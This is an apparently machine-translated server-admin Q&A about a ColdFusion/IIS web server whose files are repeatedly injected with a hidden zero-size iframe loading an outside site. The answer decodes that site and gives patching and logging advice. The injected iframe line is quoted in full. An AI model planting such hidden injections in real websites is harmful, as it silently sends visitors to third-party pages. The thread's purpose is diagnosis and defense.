似乎有什么东西入侵了网络服务器,或者有某种半恶意代码在运行,不断将代码注入我们的网站。它似乎只影响几个 coldfusion 和 html 文件。我们运行了 malwarebytes、spybot 和 AVG 防病毒软件,并删除了它们发现的所有条目,尽管条目并不多。我正在研究和安装一些入侵检测软件(如 Snort 或 OSSEC),看看这是否能帮助我找到罪魁祸首,但我想知道是否有人见过类似的事情或知道恶意代码可能隐藏在哪里。
它似乎注入了以下代码:
<iframe scrolling="no" frameborder="0" src="http://www.collegefun4u.com/" width="0" height="0"></iframe>
每晚在完全随机的时间,分成几个文件。
这是在运行 Coldfusion MX7 的 Windows 2003 服务器上。更改这些文件时,日志/事件查看器中不会显示任何内容。
答案1
首先要做的事情是立即检查到底collegefun4u
是怎么回事。
以安全的方式请求网站并解压其背后的 JS 代码,我们得到:
www.collegefun4u.com/ benign
[nothing detected] www.collegefun4u.com/
status: (referer=http:/twitter.com/trends/) saved 1205 bytes 3667a08e039642842c11744f464163baa186e4da
info: [decodingLevel=0] found JavaScript
error: undefined variable s
info: [1] no JavaScript
file: 3667a08e039642842c11744f464163baa186e4da: 1205 bytes
file: f9e4048e7e87436e12343dbcd9d467a31f0c972e: 93 bytes
Decoded Files
3667/a08e039642842c11744f464163baa186e4da from www.collegefun4u.com/ (1205 bytes, 17 hidden)
<html>
<head>
<title>Top 3 Webhosting</title>
<meta content="text/html; charset=iso-8859-1" http-equiv='Content-Type'>
<body>
<script> </script>
<table border='0' cellspacing='0' cellpadding='0' width='960' height="100%">
<tbody>
<tr>
<td>
<a target="_self" href="http://rover.ebay.com/rover/1/711-53200-19255-0/1?icep_ff3=1&pub=5574678674&toolid=10001&campid=5335950793&customid=&ipn=psmain&icep_vectorid=229466&kwid=902099&mtid=824&kw=lg">Shopping In Ebay For The Cheapest</a>
</td>
<td>
<a href="http://stats.justhost.com/track?c998ec72c307330822d1608c2d6651a1f">JustHost</a>
</td>
<td>
<a href="http://secure.hostgator.com/~affiliat/cgi-bin/affiliates/clickthru.cgi?id=hydmedia-">Hostgator</a>
</td>
</tr>
</tbody>
</table>
</body>
<script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-33569939-1']); _gaq.push(['_trackPageview']); (function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script>
</html>
f9e4/048e7e87436e12343dbcd9d467a31f0c972e from www.collegefun4u.com/ (93 bytes)
//jsunpack.called CreateElement script //jsunpack.url http://www.google-analytics.com/ga.js
请注意,我美化了 HTML 以便于阅读。
正如您所见,它至少不会试图以任何方式伤害您的用户,而只是插入一些 Webhosting(从标题中得知)垃圾邮件,表格中的三个链接横跨整个屏幕。还应注意,他们正在通过 Google Analytics 分析您的流量。
在网上进一步查找后,我发现了一个类似原因似乎和你有同样的问题。稍后,对他的页面的请求会在collegefun4u
网站中加载。URL Query 非常聪明,它会告诉我们检测到 BlackHole 漏洞攻击包 HTTP GET 请求。
确切地说,BlackHole 漏洞利用工具包最近越来越出名,用于修改服务器上的文件。它们只是利用各种类型的服务器软件中的零日漏洞来修改文件,以便发送垃圾邮件或感染许多客户端。
这个故事的底线有三点:
跟踪服务器及其软件的版本,并确保一切是更新,它从 Apache / IIS 到 Plesk 到您的框架到 PHPMyAdmin 等等。
确保您配置了面向互联网的任何内容以使其无法写入您的磁盘,这主要意味着正确配置 Plesk / PHP / 文件权限。
如果这种情况持续发生,请确保记录文件访问,以便了解哪个进程正在执行此操作。在 Windows 上,您有进程监控为此,请将其设置为按
.html
和/或.js
文件进行过滤,这样您就不会用所有访问填充页面文件。这可能会让您学到更多...